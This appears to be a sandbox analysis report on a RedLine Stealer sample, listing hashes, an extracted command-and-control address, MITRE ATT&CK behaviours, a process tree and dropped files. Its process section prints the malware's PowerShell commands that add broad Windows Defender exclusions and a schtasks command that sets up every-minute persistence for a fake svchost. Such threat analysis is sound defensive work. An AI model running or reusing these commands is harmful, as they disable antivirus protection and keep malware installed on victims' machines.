Overview

overview

10

Static

static

3

JaffaCakes...eb.exe

windows7-x64

10

JaffaCakes...eb.exe

windows10-2004-x64

10

$TEMP/Self...ed.exe

windows7-x64

8

$TEMP/Self...ed.exe

windows10-2004-x64

8

$TEMP/qT5w...NB.exe

windows7-x64

10

$TEMP/qT5w...NB.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11-01-2025 06:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_f9262caed7ba0fc77e871e26d9a5b4eb.exe

  • Size

    4.6MB

  • MD5

    f9262caed7ba0fc77e871e26d9a5b4eb

  • SHA1

    5455ad3b1de9eee55ec776d0e220bdf8488ff7d1

  • SHA256

    fafa2c77937e7b14af1d156fd7a188c74833f34a45ceb8ce241c7c991e1dea58

  • SHA512

    d2aca65022e175d2f01e624bf3b07158354262d1355b488d453fd5e9482a262cdddf9d546ca2270c63745ee24cab84f373cf285a8ef644c3b459b24088d2501c

  • SSDEEP

    98304:/q8eNY5p0ExtC6RpPwVsniC5u/BDLTABEp0moOjtchG8cV:/qup0Ex8ArMdPABEp0pAKhGVV

Score
10/10
redline@hatake03discoveryexecutioninfostealer

Malware Config

Extracted

Family

redline

Botnet

@hatake03

C2

95.181.152.6:46927

Attributes
  • auth_value

    cdf3919a262c0d6ba99116b375d7551c

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 4 IoCs
  • Redline family
    redline
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_f9262caed7ba0fc77e871e26d9a5b4eb.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_f9262caed7ba0fc77e871e26d9a5b4eb.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Users\Admin\AppData\Local\Temp\Selfconvened.exe
      C:\Users\Admin\AppData\Local\Temp\Selfconvened.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\system32\cmd.exe
        "cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2984
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1624
      • C:\Windows\system32\schtasks.exe
        "schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2664
    • C:\Users\Admin\AppData\Local\Temp\qT5w4MkRQwNB.exe
      C:\Users\Admin\AppData\Local\Temp\qT5w4MkRQwNB.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1608
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {F3E2050A-47AD-4F88-AF6D-1E9BEE4DB792} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\system32\WindowsPro\svchost.exe
      C:\Windows\system32\WindowsPro\svchost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:556
    • C:\Windows\system32\WindowsPro\svchost.exe
      C:\Windows\system32\WindowsPro\svchost.exe
      2⤵
      • Executes dropped EXE
      PID:1084

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\qT5w4MkRQwNB.exe
    Filesize

    836KB

    MD5

    b1053be5f3586f6785a57c911addc48c

    SHA1

    712b1ed92154916d48d20476cf7ff12da0c57609

    SHA256

    e0c190537e74cb9253f2bf68203513de2a258ef427dbff8552310d8767adf71c

    SHA512

    1d5b0f9c40ea2796b65835e11b1dff542d38607558dd903a922a3dea0f5e3ac117b6dcb597710d5c36851e737b1dce8069b94cff87b18c517928bcc9645eb7f4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DGKF48QC3A4UZF7R9F7O.temp
    Filesize

    7KB

    MD5

    2230bcbab2db95c4fcf32bf76795e153

    SHA1

    b82f0d9fb5019c941603cf96ec1c5f154c802459

    SHA256

    a7c652c5e8422a964a94bcc5da6232d8d68e82422f3bc60b6ab5bf9a4072d9c0

    SHA512

    fb65058288bdf7fb5c3287ac25cacbbafc6543faf576b035dca5f1308c4843df8705e1483e28cc48ca1abe4782263a04e4faa5fcd2c8bff9e736afabc2dfe8cd

    Download Submit

  • C:\Windows\System32\WindowsPro\svchost.exe
    Filesize

    10.1MB

    MD5

    da3c65253bef43d6cf4b62ba2e9bfcc0

    SHA1

    be1cc20d85a95777e991e514462c54c17e5646bb

    SHA256

    85be1593219661deb69548834a2efee25c9f66c67abb6a2dcf4ba6c3e39bd5e5

    SHA512

    47bef9b9e0d5d928550938454a7dc312e69934fa637b6a4cd157d60ad7d3694180abc29f8d5930ca1df5bcea36f299ffae3a9d706b8cd82d9ccf82b1f0f7e70a

    Download Submit

  • \Users\Admin\AppData\Local\Temp\Selfconvened.exe
    Filesize

    4.5MB

    MD5

    64b5e984fda860eedf19c29a124094fb

    SHA1

    760c195741989e17b48ad52c13bed35e8ea51692

    SHA256

    1f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39

    SHA512

    187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4

    Download Submit

  • memory/556-61-0x0000000001370000-0x00000000017EA000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/1608-22-0x00000000748F0000-0x0000000074FDE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1608-19-0x00000000748FE000-0x00000000748FF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1608-21-0x0000000000850000-0x0000000000870000-memory.dmp

    Filesize

    128KB

    Download

  • memory/1608-18-0x0000000000360000-0x000000000038E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1608-11-0x0000000000360000-0x000000000038E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1608-26-0x0000000000360000-0x000000000038E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/1608-27-0x00000000748FE000-0x00000000748FF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1608-28-0x00000000748F0000-0x0000000074FDE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1608-29-0x0000000000650000-0x0000000000727000-memory.dmp

    Filesize

    860KB

    Download

  • memory/1624-51-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1624-50-0x000000001B6B0000-0x000000001B992000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2280-20-0x0000000000080000-0x00000000004FA000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/2280-31-0x0000000020F50000-0x00000000212F8000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/2280-32-0x0000000021300000-0x00000000215A4000-memory.dmp

    Filesize

    2.6MB

    Download

  • memory/2280-30-0x0000000002740000-0x00000000027C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2280-25-0x000007FEF5B03000-0x000007FEF5B04000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2280-24-0x0000000002740000-0x00000000027C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2280-23-0x000000001C320000-0x000000001C6D8000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/2280-10-0x000007FEF5B03000-0x000007FEF5B04000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2984-39-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2984-43-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

    Download